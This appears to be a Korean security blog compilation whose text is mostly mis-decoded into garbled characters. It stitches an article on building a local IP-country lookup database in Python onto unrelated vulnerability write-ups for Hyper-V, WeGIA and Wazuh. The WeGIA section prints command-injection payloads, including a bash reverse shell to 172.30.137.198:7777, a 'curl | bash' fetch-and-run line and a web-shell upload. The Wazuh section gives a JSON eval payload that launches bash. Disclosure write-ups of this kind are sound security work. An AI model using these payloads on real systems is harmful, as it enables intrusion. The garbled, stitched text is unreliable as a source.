์ด๋ฌํ ์ฐจ์ด๊ฐ ๋ํ๋๋ ์ด์ ๋ ๋ณตํฉ์ ์ ๋๋ค. ๋ฒ์ธ์ด ํ์ฝฉ์ ์๋๋ผ๋ ๋ฌผ๋ฆฌ์ ์๋ฒ ์์น๊ฐ ๋ฏธ๊ตญ์ผ ์๋ ์๊ณ , ๊ทธ ๋ฐ๋์ผ ์๋ ์์ต๋๋ค. ๋ํ, ์๋น์ค ์ ๊ณต์๊ฐ IP ๊ตญ๊ฐ ์ ๋ณด๋ฅผ ํ์ํ ๋ ๋ฌผ๋ฆฌ์ ์์น๊ฐ ์๋๋ผ ์ฌ์ ์ ๋ฑ๋ก ๊ตญ๊ฐ ๋๋ RIR์ ํ ๋น๋ IP ๋ธ๋ก ๊ธฐ์ค์ผ๋ก ํ๊ธฐํ๋ ๊ฒฝ์ฐ๋ ์์ต๋๋ค.
๊ฑฐ๊ธฐ์ ๋ํด ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ฅผ ์ ๋ฐ์ดํธํ๋ ์ฃผ๊ธฐ๋ ์ ๋ณด ์์ง ๋ฐฉ์์ด ์๋น์ค๋ง๋ค ๋ค๋ฅด๊ธฐ ๋๋ฌธ์, ๊ฐ์ IP๋ผ๋ ์๋ก ๋ค๋ฅธ ๊ฒฐ๊ณผ๊ฐ ๋์ฌ ์ ์์ต๋๋ค.
๋ฐ์ดํฐ๋ฒ ์ด์ค๋ผ ํจ์ MySQL, PostgreSQL ๊ฐ์ DB ์ ํ๋ฆฌ์ผ์ด์ ์ด ์๋๋ผ, IP-๊ตญ๊ฐ-ASN ๋ฑ๊ณผ ๊ฐ์ IP์ ์ ๋ณด๋ฅผ ๊ตฌ์กฐํ ์์ผ ๋ฏธ๋ฆฌ ์ ๋ฆฌํ โIP ์ ๋ณด ๋ฐ์ดํฐ๋ฒ ์ด์ค ํ์ผโ์ ์๋ฏธํฉ๋๋ค. ํธ์์ ๋ฐ๋ผ json, csv, mmdb ๋ฑ ์์ ๋กญ๊ฒ ๊ตฌํํ์ฌ ์ฌ์ฉ๋๊ณ ์์ผ๋ฉฐ, ์ฃผ๋ก mmdb ํ์ผ์ ์ฌ์ฉํฉ๋๋ค.
MMDB๋ MaxMind ์ฌ์์ ๊ฐ๋ฐํ์ฌ ๊ณต๊ฐํ ํ์ผ ํฌ๋งท์ ๋๋ค. ๊ณต๊ฐ๋ ํ์ผ ํฌ๋งท์ด๋ค ๋ณด๋, MaxMind๋ฅผ ํฌํจํ ์ฌ๋ฌ IP ์ ๋ณด ์กฐํ ์๋น์ค ์ ์ฒด๋ค์ด MMDB ํ์ผ๋ก ๋ฐ์ดํฐ๋ฒ ์ด์ค ํ์ผ์ ์ ๊ณตํด ์ฃผ๊ณ ์์ต๋๋ค. mmdb ํ์ผ์ ๋ฉ๋ชจ๋ฆฌ์ ์ฌ๋ฆฐ ๋ค, ์กฐํ๋ฅผ ํ๊ธฐ ๋๋ฌธ์ IP ํ๋๋ฅผ ์กฐํํ๋ ๋ฐ ์์๋๋ ์๊ฐ์ด 0.00n์ด ๋ฏธ๋ง์ด๊ธฐ ๋๋ฌธ์ ๋ง์ ์ค์๊ฐ ์ฑ์ด ์ค์ํ ๋ณด์์ฅ๋น๋ค์ mmdb๋ฅผ ํ์ฉํ๊ณ ์์ต๋๋ค.
import maxminddbip = "8.8.8.8"with maxminddb.open_database("country_asn.mmdb") as reader: result = reader.get(ip) print(result)
{ "as_domain": "google.com", "as_name": "Google LLC", "asn": "AS15169", "continent": "NA", "continent_name": "North America", "country": "US", "country_name": "United States"}
๋ค๋ง, IP์ ์ ๋ณด(ASN ๋ฑ)๋ ๊ฒฝ์ฐ ๋งค์ผ ์ค์๊ฐ์ผ๋ก ๊ฐฑ์ ๋๊ณ ๋ณ๊ฒฝ์ฌํญ์ด ๋ฐ์ํ๊ธฐ ๋๋ฌธ์ ์์ ๊ฐ์ ํ์ผ์ ์ฃผ๊ธฐ์ ์ผ๋ก ๊ฐฑ์ ํด ์ค์ผ ํ๋ค๋ ์๊ณ ๋ก์์ด ์กด์ฌํฉ๋๋ค.
๋ง์ง๋ง์ผ๋ก Whois ํ๋กํ ์ฝ ํ์ฉ์ ๋๋ค. Whois ํ๋กํ ์ฝ์ IP ์ฃผ์๋ฅผ ๋ฃ์ด ์ง์ํ ๊ฒฝ์ฐ ์ง์ญ ๋ ์ง์คํธ๋ฆฌ(RIR)์ Whois ์๋ฒ์ IP์ ์์ธ ์ ๋ณด๋ฅผ ๋ฐํํฉ๋๋ค. RIR์์ ๊ด๋ฆฌ๋ฅผ ํ๋ค ๋ณด๋, ์ ํ๋๊ฐ ๋์ ์ ๋ณด๋ผ๊ณ ๋ณผ ์ ์๊ฒ ์ต๋๋ค.
์๋์ฐ์๋ Whois ์ปค๋งจ๋๊ฐ ๋ด์ฅ๋์ด ์์ง ์๊ธฐ ๋๋ฌธ์ Nirsoft ์ฌ์์ ๊ฐ๋ฐํ IPNetInfo๋ผ๋ ๋๊ตฌ๋ฅผ ์ข ์ข ์ฌ์ฉํ๊ณค ํฉ๋๋ค. ํนํ, ์ผ๊ด์ ์ธ ์กฐํ๋ฅผ ํ ๋ ๊ต์ฅํ ์ ์ฉํฉ๋๋ค.
Whois ํ๋กํ ์ฝ์ ๊ฒฐ๊ตญ ์๋ฒ์ ์ง์๋ฅผ ํ๋ ๋ฐฉ์์ด๊ธฐ ๋๋ฌธ์ ํ์ฐ์ ์ผ๋ก ๋คํธ์ํฌ ์ง์ฐ์ด ๋ฐ์ํ๊ณ , ์๋ฒ์ ์ํ๊ฐ ์ข์ง ์๊ฑฐ๋ ๊ณผ๋ํ ์์ฒญ์ ๋ณด๋ผ ๊ฒฝ์ฐ ์์ฒญ์ด ์ฐจ๋จ๋๋ ๊ฒฝ์ฐ๊ฐ ๋ฐ์ํ ์๋ ์์ด, IPNetInfo ์๊ฐ ํ์ด์ง์๋ ๋ค์๊ณผ ๊ฐ์ ์ค๋ช ์ด ๊ธฐ์ฌ๋์ด ์์ต๋๋ค.
๋๋๋ก ARIN์ WHOIS ์๋ฒ๊ฐ ๋ค์ด๋์ด IPNetInfo์ WHOIS ์์ฒญ์ ์๋ตํ์ง ์์ IPNetinfo๊ฐ IP ์ฃผ์๋ฅผ ๊ฒ์ํ์ง ๋ชปํ๋ ๊ฒฝ์ฐ๊ฐ ์์ต๋๋ค. ๊ทธ๋ด ๊ฒฝ์ฐ ๋์ค์ ๋ค์ ์๋ํ๋ฉด ๋ฉ๋๋ค.
๊ฐ ์กฐํ ๋ฐฉ๋ฒ๋ณ ํน์ง์ ์์ฝํ์๋ฉด ๋ค์๊ณผ ๊ฐ์ต๋๋ค.
๋ฐฉ์ | ์ต์ ์ฑ | ์ ํ์ฑ | ์๋ | ์ค๋ช |
---|---|---|---|---|
1) ์ธ๋ถ ์๋น์ค ์กฐํ | ๐ (์์ ๊ฐฑ์ ) | ๐ (๋ค์ํ ์์ค) | ๐ (๋คํธ์ํฌ ๋๊ธฐ) | - ์ฌ๋ฌ ์๋น์ค๊ฐ ์ค์๊ฐ ๋๋ ์์ฃผ ๊ฐฑ์ ๋๋ DB๋ฅผ ๊ธฐ๋ฐ์ผ๋ก ํ์ฌ ์ต์ ์ ๋ณด ํ๋ณด ๊ฐ๋ฅ ํธ๋ํฝ/์๋ฒ ์ํ์ ๋ฐ๋ผ ์กฐํ ์ง์ฐ ๋ฐ์ ๊ฐ๋ฅ ๊ณผ๋ํ ์กฐํ๋ ์๋ฒ ์ํ์ ๋ฐ๋ผ ์๋ต ์ง์ฐยท์ฐจ๋จ ๋ฐ์ ๊ฐ๋ฅ |
2) DB ์ง์ ๊ตฌ์ถ | ๐ (์ฃผ๊ธฐ ๊ฐฑ์ ํ์) | ๐ค (๋ฐ์ดํฐ ์ทจํฉ) | ๐ (๋ก์ปฌ ์กฐํ) | - ๋ก์ปฌ ํ๊ฒฝ์์ ์กฐํํ๋ฏ๋ก ์๋๊ฐ ๋งค์ฐ ๋น ๋ฆ ๋ฐ์ดํฐ ์ ๋ฐ์ดํธ ์ฃผ๊ธฐ๊ฐ ๊ธธ๋ฉด ์ต์ ์ฑยท์ ํ์ฑ ์ ํ ๊ฐ๋ฅ |
3) Whois ์๋ฒ ์กฐํ | ๐ (RIR ๋ฐ์ดํฐ) | ๐ (๊ณต์ ํ ๋น์ ๋ณด) | ๐ (๋คํธ์ํฌ ๋๊ธฐ) | - RIR ๊ณต์ ์ ๋ณด๋ฅผ ์ง์ ๋ฐ์ ์ ํ๋๊ฐ ๋์ ํธ ๊ณผ๋ํ ์กฐํ๋ ์๋ฒ ์ํ์ ๋ฐ๋ผ ์๋ต ์ง์ฐยท์ฐจ๋จ ๋ฐ์ ๊ฐ๋ฅ |
๋ฐ๋ผ์, IP ์กฐํ๊ฐ ๋น๋ฒํ๊ฒ ์ด๋ฃจ์ด์ง๊ณ ๋น ๋ฅธ ์๋ต ์๋๊ฐ ์๊ตฌ๋๋ฉฐ, ์ธ๋ถ ์ธํฐ๋ท ํต์ ์ด ๋ถ๊ฐ๋ฅํ ํ๊ฒฝ์ด๋ผ๋ฉด ์์ฒด์ ์ผ๋ก ๊ตญ๊ฐ ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ฅผ ๊ตฌ์ถํ๋ ๊ฒ์ด ๊ฐ์ฅ ์ข์ ๋ฐฉ๋ฒ์ ๋๋ค. ์ด๋ฅผ ์ํด RIR์์ ์์ฒ ๋ฐ์ดํฐ๋ฅผ ์์งํ๊ณ , ๋ก์ปฌ ํ๊ฒฝ์์ IP์ ๊ตญ๊ฐ ์ ๋ณด ๋ฐ์ดํฐ๋ฒ ์ด์ค๋ฅผ ๋ง๋๋ ๋ฐฉ๋ฒ์ ์๊ฐํ๋๋ก ํ๊ฒ ์ต๋๋ค.
์ฐ๋ฆฌ๊ฐ ์ฌ์ฉํ๋ ํผ๋ธ๋ฆญ IP ์ฃผ์ ์์์ ์ฝ 37์ต ๊ฐ๋ก ์ ํ๋ ๊ณต๊ณต์์์ ๋๋ค. ์ด๋ฌํ ์์์ ํจ์จ์ ์ผ๋ก ๊ด๋ฆฌํ๋ ค๋ฉด ์ค์์์ ์กฐ์จํ ์ ์๋ ๊ธฐ๊ตฌ๊ฐ ํ์ํฉ๋๋ค. ๊ทธ ์ญํ ์ ํ๋ ๊ณณ์ด ๋ฏธ๊ตญ์ ์ธํฐ๋ท ์ฃผ์๊ด๋ฆฌ ๊ธฐ๊ตฌ(ICANN, Internet Corporation for Assigned Names and Numbers)์ ๋๋ค.
ICANN์ IP ์ฃผ์, DNS, ํ๋กํ ์ฝ ๋ฒํธ ๋ฑ์ ์ธํฐ๋ท ๋ฆฌ์์ค๋ฅผ ๊ด๋ฆฌํ๋ ์ต์์ ๊ธฐ๊ตฌ์ ๋๋ค. ์ฌ๊ธฐ์ ๋ชจ๋ IP๋ฅผ ๊ด๋ฆฌํ ์ ์์ผ๋ ICANN ์ฐํ์ ์ธํฐ๋ท ๋ฒํธ ํ ๋น ๊ธฐ๊ด(IANA, Internet Assigned Numbers Authority)์ด ์ ์ธ๊ณ๋ฅผ ์ง์ญ๋ณ๋ก ๋๋์ด ๊ฐ ์ง์ญ ์ธํฐ๋ท ๋ฑ๋ก ๊ธฐ๊ด(RIR, Regional Internet Registries)์ IP ์ฃผ์ ๋์ญ์ ํ ๋นํ๊ณ ์์ต๋๋ค.
ํ์ฌ RIR์ ARIN(๋ถ๋ฏธ), RIPENCC(์ ๋ฝ), LACNIC(๋จ๋ฏธ), AFRINIC(์ํ๋ฆฌ์นด), APNIC(์์์) ๊ฐ 5๊ฐ์ ๊ธฐ๊ด์ผ๋ก ๊ตฌ์ฑ๋์ด ์์ต๋๋ค. ์ด ์ค์์ LACNIC, APNIC์ ๊ตญ๊ฐ ์ธํฐ๋ท ๋ ์ง์คํธ๋ฆฌ(NIR, National Internet Registries)๋ผ๋ ๊ธฐ๊ด์ ๋๊ณ ๋ค์ ์ธ๋ถ์ ์ผ๋ก ๋ถ๋ฅํ์ฌ ๊ด๋ฆฌํ๊ณ ์์ต๋๋ค.
์ฆ, ICANN โ IANA โ RIR โ NIR โ ISP ์์ผ๋ก IP ์ฃผ์๊ฐ ๊ด๋ฆฌ๋๊ณ ์๋ค๊ณ ์ดํดํ์๋ฉด ๋ฉ๋๋ค.
์ฐ๋ฆฌ๋๋ผ์ ๊ฒฝ์ฐ RIR์๊ฒ ํ ๋น๋ฐ์ IP๋ฅผ KRNIC(ํ๊ตญ์ธํฐ๋ท์งํฅ์)์์ ๊ด๋ฆฌํ๊ณ ์์ผ๋ฉฐ, ํด๋น IP๋ค์ ๊ด๋ฆฌ ๋ํ์(ISP)์๊ฒ ์ฌ ํ ๋นํ๊ณ ์์ต๋๋ค. KRNIC ์ฌ์ดํธ์์ ๋ณด๋ค ์์ธํ ๋ด์ฉ์ ํ์ธํ ์ ์์ผ๋, ๊ถ๊ธํ์ ๋ถ์ด ์์ผ๋ฉด ์ ์ํด์ ํ์ธํด ๋ณด์ ๋ ์ข์ ๊ฒ ๊ฐ์ต๋๋ค.
https://krnic.kisa.or.kr/jsp/business/management/ispInfo.jsp
์์ ์ธ๊ธํ RIR(์ ๋ ์ง์คํธ๋ฆฌ๋ณ FTP ์๋ฒ์ ํต๊ณ ์ ๋ณด๋ฅผ ํน์ ๊ฒฝ๋ก(stats)์ ํน์ ์์ (23:59:59 UTF+0)์ ํน์ ํ ์ด๋ฆ์ผ๋ก ํฌ๋งท์ผ๋ก ์ ๋ก๋ํ๊ธฐ๋ก ์ฝ์๋์ด ์์ต๋๋ค.
ํฌ๋งท๊ณผ ๊ด๋ จ๋ ์์ธํ ๋ด์ฉ์ APNIC์ RIR statistics exchange format์์ ์์ธํ ์ดํด๋ณผ ์ ์์ต๋๋ค.
์ด์ ์์ฒ ๋ฐ์ดํฐ ์์ง์ฒ์ ๋ฐ์ดํฐ ํฌ๋งท์ ํ์ธํ์ผ๋ ๊ตฌํ์ ํ ์ฐจ๋ก์ ๋๋ค.
๋ค์๊ณผ ๊ฐ์
์ด๋ฅผ ์ฝ๋๋ก ๊ตฌํํ๋ฉด ๋ค์๊ณผ ๊ฐ์ต๋๋ค.
# builtin modulesimport osimport ipaddressimport asynciofrom datetime import datetime# install modulesimport aiohttpintervals = []today = datetime.now().strftime("%Y%m%d")RIR_URLS = [ "https://ftp.apnic.net/stats/apnic/delegated-apnic-extended-latest", "https://ftp.arin.net/pub/stats/arin/delegated-arin-extended-latest", "https://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-extended-latest", "https://ftp.ripe.net/pub/stats/ripencc/delegated-ripencc-extended-latest", "https://ftp.afrinic.net/stats/afrinic/delegated-afrinic-extended-latest",]MAPPING_DATABASE = f"./rsc/{today}_mapping.db"# ๋ค์ด๋ก๋async def fetch(session, url): async with session.get(url) as response: print(f"[{response.status}] - {url}") content = await response.read() filename = url.split("/")[-1] filepath = f"./rsc/{today}_{filename}" with open(filepath, "wb") as f: f.write(content) return# ๋ค์ด๋ก๋ ์ฝ๋ฃจํดasync def download(): async with aiohttp.ClientSession() as session: await asyncio.gather(*(fetch(session, url) for url in RIR_URLS)) print("Download Complete") return# ๋ฐ์ดํฐ๋ฒ ์ด์ค ๋ก๋def init_database(): if not os.path.exists("./rsc"): os.mkdir("./rsc") # IP ๋ฐ์ดํฐ๋ฒ ์ด์ค ์
์ด ์กด์ฌํ ๊ฒฝ์ฐ ๋ฉ๋ชจ๋ฆฌ ๋ก๋ if os.path.exists(MAPPING_DATABASE): print("Databse load") with open(MAPPING_DATABASE, "r") as f: for line in f: start_ip, end_ip, country = line.strip().split(",") intervals.append((int(start_ip), int(end_ip), country)) return # IP ๋ฐ์ดํฐ๋ฒ ์ด์ค ์
์ด ์กด์ฌํ์ง ์์ ๊ฒฝ์ฐ ๋ค์ด๋ก๋ ํ ์ ์ฅ ๋ฐ ๊ฐ๊ณต asyncio.run(download()) for rir_url in RIR_URLS: filename = rir_url.split("/")[-1] filepath = f"./rsc/{today}_{filename}" with open(filepath, "r") as f: for line in f: line = line.strip().split("|") if len(line) != 8 or line[2] != "ipv4": continue country = line[1] ip = line[3] ip_range = line[4] start_ip = int(ipaddress.IPv4Address(ip)) end_ip = (int(ipaddress.IPv4Address(ip)) + int(ip_range)) - 1 result = (start_ip, end_ip, country) intervals.append(result) # ๋ฐ์ดํฐ๋ฒ ์ด์ค์
์ ์ฅ intervals.sort(key=lambda x: x[0]) with open(MAPPING_DATABASE, "w") as f: for interval in intervals: line = f"{interval[0]},{interval[1]},{interval[2]}" f.write(line + "\n") print("Databse load") return# ํ์def search(search_ip): result = None try: search_ip = int(ipaddress.IPv4Address(search_ip)) except: return None left, right = 0, len(intervals) - 1 while left <= right: mid = (left + right) // 2 start_ip, end_ip, country = intervals[mid] if start_ip <= search_ip <= end_ip: result = country break elif start_ip > search_ip: right = mid - 1 else: left = mid + 1 return resultdef main(): init_database() while True: ipv4 = input("Insert IPv4: ") r = search(ipv4) print(r)if __name__ == "__main__": main()
RIR์์ ๋ค์ด๋ก๋ ๋ฐ์ ๋ฐ์ดํฐ๋ฅผ ํ์ธํ ๊ฒฝ์ฐ 253,714๊ฐ์ IP ๋์ญ(์ฝ 37์ต๊ฐ)์ด ํ์ธ๋ฉ๋๋ค. ๊ณต๊ฐ๋ ํผ๋ธ๋ฆญ IP์ ๊ตญ๊ฐ ์ ๋ณด๋ ํ์ธ ๊ฐ๋ฅํ ๊ฒ๊ณผ ๋ค๋ฆ์๋ ์ ์ ๋๋ค. ๋ํ, ๊ณต๊ต๋กญ๊ฒ๋ ์ ๊ฐ ์์ฑํ ํ๋ก๊ทธ๋จ์ด MMDB๋ก ์กฐํํ๋ ๊ฒ๋ณด๋ค 30 ~ 250๋ฐฐ ๊ฐ๋ ๋น ๋ฅธ ์๋๋ก ์กฐํ๊ฐ ๋์์ต๋๋ค.
์ถ์ธกํ๊ธฐ์ MMDB์๋ IP ๋์ญ์ด ์กฐ๊ธ ๋ ์ธ๋ถ์ ์ผ๋ก ๋๋ ์ ธ ์๊ณ , ๋ค๋ฅธ ์ ๋ณด(ASN)๋ค๋ ํจ๊ป ์กฐํ๊ฐ ๊ฐ๋ฅํ๋ค ๋ณด๋ ์ด๋ฐ ๊ฒฐ๊ณผ๊ฐ ๋์ค์ง ์์์๊น ์กฐ์ฌ์ค๋ ์๊ฐํด ๋ด ๋๋ค.
RIR ๋ฐ์ดํฐ์๋ IP์ ASN์ ํ ๋นํ๋ค ๋ผ๋ ๋ด์ฉ๋ง ํฌํจ๋์ด ์์ด, ํน์ IP๊ฐ ์ด๋ค ASN์ ์ํด์๋์ง๋ ์ ์๊ฐ ์์ต๋๋ค. ์ด ์ ๋ณด๋ฅผ ํ์ธํ๋ ค๋ฉด BGP(Border Gateway Protocol)ํ ์ด๋ธ์์ ์์ง์ด ํ์ํ๋ฐ์. ๋ด์ฉ์ด ๋๋ฌด ๊ธธ์ด์ง๋ค ๋ณด๋, ๋ค์ ์ฐ๊ตฌ๊ธ์์ ์ด์ด๊ฐ๋๋ก ํ๊ฒ ์ต๋๋ค.
์ ์ ๊ฑด๊ฐ์ ์ํด์ ๊ฐ๊ธ์ ์ด๋ฉด ipinfo์์ mmdb ํ์ผ์ ์ฃผ๊ธฐ์ ์ผ๋ก ๋ค์ด๋ก๋ ๋ฐ๋ ๊ฑธ ๊ถ์ฅํฉ๋๋ค.
Windows Hyper-V NT Kernel Integration VSP ๊ตฌ์ฑ ์์์์ ๋ฐ๊ฒฌ๋ heap buffer overflow๋ก ์ธํ ๊ถํ ์์น ์ทจ์ฝ์ ์ PoC๊ฐ ๊ณต๊ฐ๋์์ต๋๋ค.
์ทจ์ฝ์ ์ Windows 10 1903๋ถํฐ ์ถ๊ฐ๋ CrossVmEvent ๊ฐ์ฒด ๊ด๋ จ syscall์ธ NtCreateCrossVmEvent
์์ ๋ฐ์ํ๋ MS Advisory์ ๋ฐ๋ฅด๋ฉด ์ํฅ๋ฐ๋ Windows ๋ฒ์ ์ Windows 10 21H2 ~ Windows 11 24H2์
๋๋ค.
์ทจ์ฝ์ ์ ํธ๋ฆฌ๊ฑฐํ๊ธฐ ์ํด์๋ windows sandbox ๊ธฐ๋ฅ์ด ํ์ฑํ๋์ด ์์ด์ผ ํฉ๋๋ค.
CrossVmEvent๋ ํธ์คํธ์ ๊ฒ์คํธ ๋จธ์ ๊ฐ ํจ์จ์ ์ธ ๋ฆฌ์์ค ๊ด๋ฆฌ, ํต์ ์ ์ฒ๋ฆฌํ๋ Virtual Service Provider ๊ด๋ จ ๊ฐ์ฒด์
ํด๋น syscall์ ์ฒ๋ฆฌํ๋ vkrnlintvsp.sys
๋๋ผ์ด๋ฒ๋ VkiRootAdjustSecurityDescriptorForVmwp
ํจ์์์ ๊ฐ์ฒด์ DACL ๋ฌธ์์ด์ ์์ ํฉ๋๋ค.
__int64 __fastcall VkiRootAdjustSecurityDescriptorForVmwp(void *a1, char a2)//... if ( ObjectSecurity >= 0 ) { ObjectSecurity = SeConvertStringSidToSid( L"S-1-15-3-1024-2268835264-3721307629-241982045-173645152-1490879176-104643441-2915960892-1612460704", &P); if ( ObjectSecurity >= 0 ) { // Patched Code if ( (Feature_2878879035__private_IsEnabledDeviceUsage)(v6) ) { v7 = RtlLengthSid(Sid); v8 = RtlLengthSid(P) + 16 + v7; v9 = Dacl->AclSize + v8; if ( v9 < v8 ) { ObjectSecurity = 0xC0000095; goto LABEL_20; } } // Vulnable Code else { SidLength = RtlLengthSid(Sid) + RtlLengthSid(P); dwAclSize = Dacl->AclSize + SidLength + 16; } Pool2 = ExAllocatePool2(256i64, dwAclSize, 1867671894i64); v4 = Pool2; if ( Pool2 ) { memmove(Pool2, Dacl, Dacl->AclSize);//...
ํจ์น ์ ์ฝ๋๋ ์ ์ ๊ฐ ์ปจํธ๋กค ๊ฐ๋ฅํ ๊ฐ์ฒด์ DACL์ SID๋ฅผ ์ถ๊ฐํ๋ ๊ณผ์ ์์ Pool์ ํ ๋นํ ์ฌ์ด์ฆ ๊ณ์ฐ ์ integer overflow๊ฐ ๋ฐ์ํ์ง๋ง ์ ์ ํ bound check๊ฐ ์กด์ฌํ์ง ์์ ์์๋ณด๋ค ์์ dwAclSize
๋งํผ ํ ๋นํ๊ฒ ๋ฉ๋๋ค.
๊ฒฐ๊ณผ์ ์ผ๋ก ์์๋ณด๋ค ์๊ฒ ํ ๋น๋ Pool Buffer์ AclSize
๋งํผ ๋ณต์ฌํ๋ memmove ํธ์ถ์์ 0xfff0
ํฌ๊ธฐ์ overflow๊ฐ ๊ฐ๋ฅํฉ๋๋ค.
poc๋ ํด๋น ์ทจ์ฝ์ ํธ๋ฆฌ๊ฑฐ ์ดํ I/O Ring Exploit ๊ธฐ๋ฒ์ ์ฌ์ฉํฉ๋๋ค. ํ์ด์ง ํ์ _IOP_MC_BUFFER_ENTRY
ํฌ์ธํฐ ๋ฐฐ์ด์ ํ ๋นํ๊ณ , ์ ์ ๋๋์ ํ ๋นํ fake IOP_MC_BUFFER_ENTRY
๊ฐ์ฒด๋ฅผ ์ทจ์ฝ์ ์ ์ด์ฉํด ์คํ๋ ์ดํด ๋ฎ์ด์๋๋ค. ์ดํ BuildIoRingWriteFile()
์ BuildIoRingReadFile()
๋ฅผ ์ฌ์ฉํด ์ปค๋ ์์ ์ฝ๊ธฐ/์ฐ๊ธฐ๋ฅผ ์ป์ด ๊ถํ ์์น์ ์ํํฉ๋๋ค.
์ทจ์ฝ์ ์ ํจ์น๋ ์์ ๊ฐ์ด AclSize
์ Sid
์ฌ์ด์ฆ ์ฐ์ฐ ๊ฒฐ๊ณผ๊ฐ Sid
์ฌ์ด์ฆ๋ณด๋ค ์์ ๊ฒฝ์ฐ ๋ณต์ฌ๋ฅผ ์ค๋จํ๋ ๊ฒ์ผ๋ก ์ด๋ฃจ์ด์ก์ต๋๋ค.
๊ธฐ๊ด์ ๋์์ผ๋ก ์น ํตํฉ ๊ด๋ฆฌ ์์คํ ์ ์ ๊ณตํ๋ WeGIA์ application์์ parameter ๊ฒ์ฆ ๋ฏธํก์ผ๋ก ์ธํ RCE ์ทจ์ฝ์ ์ด ๋ฐ์ํ์์ต๋๋ค.
์ทจ์ฝ์ ์ importar_dump.php
๋ด๋ถ์ ์๋ ๊ตฌ๋ฌธ์์ ๋ฐ์ํฉ๋๋ค.
$log = shell_exec("mv ". $_FILES["import"]["tmp_name"] . " " . BKP_DIR . $_FILES["import"]["name"]);
shell_exec()
ํจ์๋ฅผ ํตํด mv
๋ช
๋ น์ด๋ก ์์ ํ์ผ์ ์ด๋ํ๋ ๋ช
๋ น์ ์ํํฉ๋๋ค.
์ฌ๊ธฐ์ parameter์ ๋ํ ๊ฒ์ฆ์ด ๋ฏธํกํ๊ธฐ ๋๋ฌธ์ Command Injection ์ทจ์ฝ์ ์ด ๋ฐ์ํฉ๋๋ค.
์ถ๊ฐ๋ก ์์ ํ์ผ์ ์ด๋ํ๋ ๋ช ๋ น์ด๊ธฐ์ Reverse Shell ์ฌ์ฉ๊ณผ Web Shell ์ ๋ก๋๋ ๊ฐ๋ฅํฉ๋๋ค.
์ธ์ ๊ฒ์ฆ ์ดํ ๋ฆฌ๋ค์ด๋ ์ ๊ตฌ๋ฌธ์ด ์กด์ฌํ๋, ์คํ ์ข ๋ฃ ํ๋ก์ธ์ค๊ฐ ์กด์ฌํ์ง ์์ต๋๋ค.
<?phpif (!isset($_SESSION["usuario"])){ header("Location: ../../index.php");}
์ด๋ก ์ธํด ๋ณ๋์ ๋ก๊ทธ์ธ ๊ณผ์ ์ด ์์ด๋ ์์์ ์ฝ๋ ์คํ ๋ฐ ํ์ผ ์ ๋ก๋ ๊ณต๊ฒฉ์ด ๊ฐ๋ฅํฉ๋๋ค.
PoC๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค.
sleep 5
๋ช
๋ น์ ์คํํ๋ Command Injection์ ์ํํฉ๋๋ค.
filename
์ a
์ด๋ฆ์ผ๋ก ํจ๊ป ๋ด์ ์ ๋ฌํ๋ฉด sleep 5
๋ช
๋ น์ด ์ํ ๋ ๊ฒ์ ํ์ธ ํ ์ ์์ต๋๋ค.
a;sleep 5
์๋์ ๊ฐ์ด reverse shell์ ๋น๋ํฉ๋๋ค.
bash -i >& /dev/tcp/172.30.137.198/7777 0>&1
|
๋ก bash shell์ ์ ๋ฌํ๋ฉด reverse shell์ด ์คํ๋ฉ๋๋ค. ์์๋ ์๋์ ๊ฐ์ต๋๋ค.
a;curl -L <your_page_responses_rev_shell_code> | bash
Web Shell ์ ๋ก๋๋ ๊ตฌํ๋์ด ์๋ ํ์ผ ์ ๋ก๋ ๊ธฐ๋ฅ์ ์ด์ฉํ์ฌ php Web Shell์ ์ฝ๊ฒ ์ ๋ก๋ ํ ์ ์์ต๋๋ค.
PoC์์๋ l8BL.php
๋ผ๋ ์ด๋ฆ์ผ๋ก php Web Shell์ ์
๋ก๋ํ์ต๋๋ค.
ํด๋น ์ทจ์ฝ์ ์ escapeshellarg() ํจ์๋ฅผ ํตํด command injection์ ์ฌ์ฉ๋๋ ํน์ ๋ฌธ์์ ๋ํด ์ด์ค์ผ์ดํ ํ๋๋ก ๋ณด์ํ์ต๋๋ค.
๊ทธ๋ฆฌ๊ณ exit() ํจ์๋ฅผ ์ถ๊ฐํด ์ธ์ ๊ฒ์ฆ ์ดํ ์ข ๋ฃ ๊ตฌ๋ฌธ์ ์ถ๊ฐํ์ฌ ๋ณด์ ํ์ต๋๋ค.
CVE-2025-24016๋ ์คํ์์ค SIEM(Security Information and Event Management)์ธ Wazuh์์ ๋ฐ์ํ๋ ์์ ํ์ง ์์ ์ญ์ง๋ ฌํ๋ก ์ธํ RCE ์ทจ์ฝ์ ์ ๋๋ค. Wazuh๋ ํฌ๊ฒ Wazuh Agent, Wazuh Manager, Elasticsearch & Kibana๋ก ๊ตฌ์ฑ๋์ด ์์ต๋๋ค.
ํด๋น ์ทจ์ฝ์ ์ ๊ทผ๋ณธ ์์ธ์ Wazuh Manager์์ eval
ํจ์๋ฅผ ์ฌ์ฉํจ์ผ๋ก์จ ๋ฐ์ํฉ๋๋ค. Wazuh Manager์ ์ผ๋ถ API๋ JSON ์์ฒญ์ ์ญ์ง๋ ฌํ(json.loads()
)ํ ๋, object_hook
์ต์
์ ํตํด as_wazuh_object
ํจ์๋ฅผ ํธ์ถํ์ฌ ํ์ฒ๋ฆฌ๋ฅผ ์ํํฉ๋๋ค.
as_wazuh_object
ํจ์๋ JSON ๋ด๋ถ์ __unhandled_exc__
ํค๊ฐ ์์ ๊ฒฝ์ฐ, ๊ทธ ์์ __class__
์ __args__
๊ฐ์ ์ฌ์ฉํด eval
ํจ์๋ฅผ ํธ์ถํฉ๋๋ค. ์ด ๊ณผ์ ์์ ์ฌ์ฉ์ ์
๋ ฅ์ ๊ทธ๋๋ก eval
์ ์ ๋ฌํ๋ฏ๋ก ์์ ๋ช
๋ น ์คํ์ด ๊ฐ๋ฅํฉ๋๋ค.
์๋ฅผ ๋ค์ด, ์๋์ ๊ฐ์ JSON์ API ์์ฒญ์ผ๋ก ์ ๋ฌํ๋ฉด os.system("bash")
๊ฐ ์คํ๋์ด RCE๊ฐ ๋ฐ์ํ ์ ์์ต๋๋ค.
{ "__unhandled_exc__": { "__class__": "os.system", "__args__": [ "bash"]}}
ํด๋น ์ทจ์ฝ์ ์ eval
ํจ์๋ฅผ literal_eval
ํจ์๋ก ํจ์นํ๋ฉฐ ์ ํ๋ ํ์
